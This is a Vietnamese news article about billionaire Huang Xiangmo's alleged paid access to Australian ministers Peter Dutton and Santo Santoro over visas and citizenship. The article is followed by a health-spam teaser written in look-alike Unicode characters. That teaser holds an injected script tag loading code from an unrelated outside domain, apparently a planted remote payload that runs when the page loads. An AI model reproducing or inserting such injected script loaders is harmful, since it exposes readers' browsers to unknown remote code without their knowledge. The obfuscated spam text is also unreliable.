RSS

Vụ tước quyền cư trú của tỉ phú Trung Quốc: Lật tẩy đường dây “ăn chia” của chính khách Úc

09:00 10/04/2019

Năm 2016, tỉ phú có mối quan hệ mật thiết với Đảng Cộng Sản Trung Quốc Huang Xiangmo (Hoàng Hướng Mặc) đã kín đáo chuyển hàng chục nghìn đô la cho một cựu bộ trưởng thuộc Đảng Tự do. Ông nhờ người này sắp xếp một cuộc gặp riêng với Peter Dutton nhằm thương lượng việc giữ lại thị thực Úc và tiến hành nhập tịch.

Santo Santoro, người trung gian móc nối trong câu chuyện, đã hẹn ông Dutton – vốn là Bộ trưởng Di trú của chính phủ Turnbull lúc bấy giờ – đến ăn trưa tại một nhà hàng Trung Hoa ở Sydney.

Huang tại căn nhà hạng sang ở Mosman trước khi bị hủy tư cách nhập cư.

Sau cuộc gặp gỡ, một nguồn tin bí mật cho biết ông Huang đã được phép tiếp xúc trực tiếp với Bộ trưởng Nội vụ. Đây là ưu đãi không phải ai cũng có được.

Hiện tại, ông Dutton và ông Santoro đều là nghị sĩ vận động hành lang tại Queensland. Cả hai người phủ nhận nghi vấn cung cấp quyền ưu tiên cho ông Huang trong cuộc gặp hôm đó. Cuối cùng, Huang vẫn bị tước thị thực công dân do có mối liên hệ sâu sắc với Đảng Cộng Sản Trung Quốc, theo thông tin từ Cơ quan An ninh Tình báo Úc (ASIO).

Song, sau quá trình điều tra, Age, Sydney Morning Herald và Four Corners đưa ra kết luận rằng ông Dutton vẫn bao che cho vợ con ông Huang. Năm 2015, ông đã chỉ thị cho nghị sĩ Đảng Lao động Sam Dastyari tổ chức một buổi lễ nhận quốc tịch bí mật dành cho những người này.

Điều đáng nói là lễ nhận quốc tịch phải được tổ chức ở nơi công cộng, quy tụ nhiều công dân mới ở Úc. Nói cách khác, trừ phi bị bệnh, có nhu cầu cấp thiết hay không đủ khả năng tham dự ở nơi đông người, thì không ai được quyền làm lễ nhập tịch riêng.

Nhà hàng nơi diễn ra cuộc gặp gỡ.

Sau khi Dutton biết gia đình ông Huang muốn sang nước ngoài, họ liền được đẩy nhanh tốc độ duyệt hồ sơ thị thực lên đến cả tuần, thậm chí vài tháng.

Hiện các thành viên trong gia đình của Huang đang tạm điều hành sản nghiệp của ông tại Úc, trong thời gian ông bị cấm nhập cư.

Santoro thừa nhận mình và Dutton là “bạn tốt” và thu phí ít nhất 10,000 đô la cho mỗi trường hợp yêu cầu tiếp xúc với văn phòng của ông Dutton nhằm đẩy nhanh tốc độ duyệt hồ sơ visa. Được biết, hai người từng là cựu đồng minh trong phe phái.

Theo ghi chép của cơ quan điều tra, ông Santoro từng nói: “Ngoài tôi ra, sẽ chẳng có ai giúp được các vị trong việc xin thị thực đến mức ấy. Chẳng ai cả… Tôi có thể dễ dàng đề nghị một nhân viên trong văn phòng Bộ trưởng ‘chú ý nhiều hơn đến hồ sơ này’, nếu tôi muốn.”

Fiona Huang, vợ của tỉ phú Huang Xiangmo.

Kết luận từ Age, Sydney Morning Herald và Four Corners còn cho biết có hai doanh nhân người Trung Quốc đứng sau cuộc vận động gây quỹ cho cựu Thủ tướng Tony Abbott. Hoạt động này diễn ra tại một sân golf, cách địa điểm bầu cử của ông 70km.

Trung Quốc cũng tận dụng tối đa ưu thế của mình để bành trướng thế lực trên đất Úc, bao gồm việc lấn lướt chính quyền địa phương và thẩm vấn hai công dân Úc có liên hệ với cố vấn cấp cao của ông Malcolm Turnbull về vấn đề dính líu đến Trung Quốc.

Sau khi từ chức vào năm 2017 vì cáo buộc gian lận trong vụ việc với Huang, ông Dastyari thừa nhận mình đã đề nghị ông Dutton “chiếu cố” cho gia đình tỉ phú Trung Quốc trong việc xin nhập tịch.

Một quan chức cấp cao khác thuộc Đảng Tự do và người gây quỹ cũng hứa sẽ thay mặt Huang để vận động hành lang giúp cho ông Dutton.

“Ông Peter Dutton không thể thoát khỏi trách nhiệm trong chuyện này,” Dastyari nói.

“Tôi đã cho rằng đề nghị của mình là bất khả thi. Thế nhưng tốc độ và quy trình phê duyệt của Dutton thực sự khiến tôi ngạc nhiên. Bây giờ nghĩ lại chỉ thấy quá bất thường, điều đó khiến tôi lo ngại.”

Dutton vẫn từ chối đưa ra phát ngôn chính thức về nghi vấn liên lạc với người của Đảng Tự do để thỏa thuận việc thúc đấy trao quyền công dân cho Huang và gia quyến. Song, ông đã khẳng định ông Huang “hoàn toàn không đóng góp hay tài trợ gì” cho chiến dịch tranh cử của mình.

“Ông Dastyari nên chuẩn bị trả lời chất vấn xoay quanh việc tổ chức lễ nhận quốc tịch bí mật trước đó,” Dutton phát biểu.

Peter Dutton từng giữ chức Bộ trưởng Di trú năm 2015.

Trước sức ép đến từ nhiều phía, Dastyari đã buộc phải từ chức sau những giao dịch mờ ám với Huang. Song, ông cũng lên tiếng chỉ trích ý kiến cho rằng Dutton đồng ý giúp đỡ chỉ vì mối quan hệ với một Thượng nghị sĩ Đảng Lao động là “lố bịch”.

Bữa trưa với Bộ trưởng và Quý ngài đến từ Bắc Kinh

Năm 2016, đơn xin nhập tịch của Huang đã bị bác bỏ vì ASIO lo ngại về mối quan hệ mật thiết giữa ông và Đảng Cộng Sản Trung Quốc.

Từ khi đến Úc vào năm 2011, ông Huang đã vung tiền tài trợ cho các chính trị gia, trường đại học và nhiều tổ chức từ thiện trên khắp cả nước. Song, ông cũng là người đứng đầu tổ chức vận động tạo ảnh hưởng của Đảng Cộng Sản Trung Quốc tại Sydney mang tên ACPPRC.

Thượng nghị sĩ Santo Santoro buộc phải từ chức sau vụ bê bối này.

Trước tình thế visa có nguy cơ không giữ được, Huang quyết định tìm đến Santo Santoro – một cựu Bộ trưởng dưới quyền ông Howard, lúc bấy giờ đang tiến hành vận động hành lang.

Santoro kiếm chác chủ yếu nhờ vào đường dây móc nối với các chính trị gia cấp cao. Theo điều tra từ The Age, Herald và Four Corners, ông từng tuyên bố mình có liên hệ thân thiết với Peter Dutton trong một cuộc gặp bí mật.

Ghi âm cho thấy Santoro khẳng định Dutton là “chính khách chính trực nhất” mình từng biết, song ông ta cũng “sẵn lòng giúp đỡ” nếu thu được “một khoản đầu tư kha khá vào nước Úc”.

Santoro tuyên bố mình có thể sắp xếp thúc đẩy tốc độ duyệt hồ sơ thị thực và liên hệ với văn phòng của Dutton cho những ai có nhu cầu với mức phí tầm 20,000 đô la.

“Ngoài tôi ra, sẽ chẳng có ai giúp được các vị trong việc xin thị thực đến mức ấy. Chẳng ai cả… Tôi có thể dễ dàng đề nghị một nhân viên trong văn phòng Bộ trưởng ‘chú ý nhiều hơn đến hồ sơ này’, nếu tôi muốn.

“Nếu tôi cứ thế mà cầm hồ sơ của các vị đi thẳng đến Canberra, đưa cho ai đó và hỏi họ có thể giúp đỡ không, thì phải có điều kiện. Tôi phải được nhận thù lao xứng đáng.”

Với hành động mua chuộc Santoro vào năm 2016, Huang được cho là nóng lòng muốn đảm bảo cơ hội giữ được tư cách công dân Úc của mình.

Hiện sản nghiệp của Huang Xiangmo tại Úc đều do con trai là Jimmy Huang quản lý.

Trong bữa trưa hôm ấy, Santoro đã sắp xếp để Huang gặp gỡ Dutton và một viên chức cấp cao khác trong văn phòng Bộ trưởng tại nhà hàng thượng lưu Master Ken ở khu phố người Hoa (Sydney).

Khi bị chất vấn, ông Santoro thừa nhận họ đã ăn trưa cùng nhau, nhưng không nhằm mục đích tạo điều kiện cho Huang tiếp cận Dutton. Đại đa số người nộp đơn xin nhập tịch không được gặp Bộ trưởng Di trú.

Cựu Bộ trưởng của chính phủ Howard cho biết mình chỉ chịu trách nhiệm giới thiệu về quy trình xét duyệt hồ sơ nhập tịch cho Huang chứ không hề nhúng tay vào quá trình thực hiện. Khi được hỏi về khoản tiền mà tỉ phú Trung Quốc đã đầu tư cho ông trong suốt thời gian tranh cử, Santoro cho biết: “Đó là chuyện riêng giữa tôi và ông Huang.”

“Nói chung thì, tôi chỉ là muốn giúp ông ấy hiểu biết thêm về chính trường Úc.”

Ông Dutton từ chối trả lời các câu hỏi cụ thể về thỏa thuận giữa mình với Santoro. Song, ông xác nhận mình đã “dùng bữa với Huang trên cương vị lãnh đạo cộng đồng người Hoa tại Sydney“.

“Tôi cam đoan mình không hề đại diện cho Bộ hoặc bất kỳ cơ quan nào khác trong chính phủ khi đến gặp ông Huang vào hôm đó,” Dutton nói.

Tỉ phú Trung Quốc cũng lảng tránh việc đưa ra phát ngôn vào lúc này. Tuy nhiên, phát ngôn viên cho biết cuộc gặp giữa ông Huang và Santoro chỉ gói gọn trong việc “đề xuất ý tưởng kinh doanh”,  bao gồm cả “dự án phát triển liên quan đến núi lửa trên đảo Silicy, Italy”.

Hộ chiếu của Huang đã bị hủy vào tháng 11 năm ngoái. Theo nhận định từ ASIO, ông sẽ bị tước quyền cư trú và cấm nhập cư vào Úc vì mối đe dọa đến chiến dịch chống can thiệp nước ngoài của nước này.

Nguồn: Vietucnews.net

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.